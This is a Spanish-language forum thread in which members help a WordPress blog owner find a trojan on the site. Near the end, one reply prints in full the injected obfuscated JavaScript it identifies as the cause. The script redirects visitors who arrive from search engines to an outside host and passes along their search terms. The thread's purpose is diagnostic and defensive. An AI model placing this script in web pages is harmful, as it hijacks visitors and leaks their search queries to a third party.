Tengo un troyano en mi bloc

  • Autor Autor tonimotlos
  • Fecha de inicio Fecha de inicio
Busca en tu plantilla HTML algun Embedd extraño , eliminalo y visualiza haber si ya no lo tienes.

Mi consejo es que vayas linea a linea revisando todo el código 🙂

Un Saludo y muchísima suerte

Edito : Segun mi antivirus , el conflicto lo tienes en el header.gif

Con esta ruta : http://www.aquimicocina.com/wp-content/themes/thewebnews/images/header.gif

Aunque me aparece un error , pero elimina el header.gif y vamos a ver si así se soluciona el problema

Edito 2 : Te muestro una captura de pantalla con la URL que me detecta el conflicto : Enlace eliminado

Edito 3 : Tienes 2 problemas , uno el que te he marcado arriba y el 2º es que en la pagina principal y entradas te redirige mira la captura de pantalla : Enlace eliminado

Revisa el código y la imagen . Un Saludo!
 
Última edición:
Gracias, no existe ningun archivo header.gif, i en el codigo no veo nada,¿ podria ser de los banners de smowtion?
 
Gracias, no existe ningun archivo header.gif, i en el codigo no veo nada,¿ podria ser de los banners de smowtion?

No creo . Haber , piensa en la ultima actividad que realizaste antes de que te apareciera el trollano. Instalaste un plugin o algo ?
 
Llevo tiempo sin añadir pluguins.

Solo hice una reseña, pero en la reseña no hay nada
 
Registra tu sitio en el Webmaster Tools de Google, y ahi mismo te dira las URL exactas y el codigo malicioso.
 
Descarga el plugin antivirus y pasalo, o busca el codgo "eval" y ahi lo tienes, te recomiendo el antivirus
 
Checa esta linea, parece sospechosa y ser la del problema:
PHP:
eval(function(p,a,c,k,e,r){e=function(c){return(c< a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCh...

Este es tu problema:
PHP:
<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>

Verifica en tu index.php
 
Última edición:
Exacto, lo que dice el amigo de arriba , eso es sin duda. Borralo y listo
 
Atrás
Arriba